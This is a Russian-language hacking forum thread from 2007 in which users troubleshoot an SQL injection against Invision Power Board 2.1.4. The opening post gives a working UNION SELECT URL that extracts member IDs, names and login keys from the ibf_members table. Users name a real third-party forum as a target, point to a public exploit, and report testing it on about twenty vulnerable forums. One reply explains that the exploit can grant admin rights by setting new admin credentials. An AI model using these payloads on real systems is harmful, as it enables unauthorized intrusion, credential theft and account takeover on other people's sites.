Вопрос по Ipb

Discussion in 'Песочница' started by AlexCRC, 26 Mar 2007.

  1. AlexCRC

    AlexCRC Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    35
    Likes Received:
    6
    Reputations:
    0
    Эсть IPB 2.1.4
    Уязвим.
    Вот такая ссылка:
    PHP:
    index.php?&act=Post&CODE=02&f=3&t=9&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20ibf_members%20%20WHERE%20id=1%20/*
    выдает цитату на 58 пост.
    И все.
    Префикс ibf_ (точно!
    PHP:
    index.php?act=task&ck='
    проверено =))) )

    В чем может быть трабла?
     
  2. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Думаю оффтоп, но все-таки скажу в конце ссылки /* нету...
     
  3. AlexCRC

    AlexCRC Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    35
    Likes Received:
    6
    Reputations:
    0
    То я видимо часть не скопировал. она эсть.

     
  4. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Кинь ссылку в ПМ, посмотрю что можно сделать...
     
  5. AlexCRC

    AlexCRC Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    35
    Likes Received:
    6
    Reputations:
    0
    Проверил на другом форуме - тоже самое :'(

    и еще на одном :(
     
    #5 AlexCRC, 26 Mar 2007
    Last edited: 26 Mar 2007
  6. AlexCRC

    AlexCRC Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    35
    Likes Received:
    6
    Reputations:
    0
    идей нет? :(
     
  7. x_zStas_x

    x_zStas_x New Member

    Joined:
    17 Mar 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    дай ссылку на какой-нить форум!
     
  8. AlexCRC

    AlexCRC Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    35
    Likes Received:
    6
    Reputations:
    0
    к примеру http://www.gameforums.jino-net.ru
     
  9. x_zStas_x

    x_zStas_x New Member

    Joined:
    17 Mar 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    _ttp://www.milw0rm.com/exploits/2010
    сполит с гуи канает на том :) просто лень инъекцию мутить :)
     
  10. AlexCRC

    AlexCRC Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    35
    Likes Received:
    6
    Reputations:
    0
    А как с ним работать?
    Пишет что форум уязвим.
    При попытке узнать префикс - ошибка. но префикс то ibf_
    При нажатии "Get data from database" все время получаю разные хеши. В чем дело?
     
  11. x_zStas_x

    x_zStas_x New Member

    Joined:
    17 Mar 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    не знаю, я потестил где-то на 20 уязвимых форумах, на всех префикс обнаружил.
     
  12. Rosssi

    Rosssi New Member

    Joined:
    13 Mar 2007
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    Скажи плз что этот сплоит делает :)
     
  13. lol2006

    lol2006 Elder - Старейшина

    Joined:
    25 May 2006
    Messages:
    75
    Likes Received:
    16
    Reputations:
    0
    usery s id=* - какое поставишь можешь присвоить права админа, если укажешь в полях:

    $new_admin_name = 'rstghc';
    $new_admin_password = 'rstghc';

    существующего пользователя(т.е. зареганый твой) - на большинство форумах эта баGа неработает(((!
     
    #13 lol2006, 30 Mar 2007
    Last edited: 4 Apr 2007
Loading...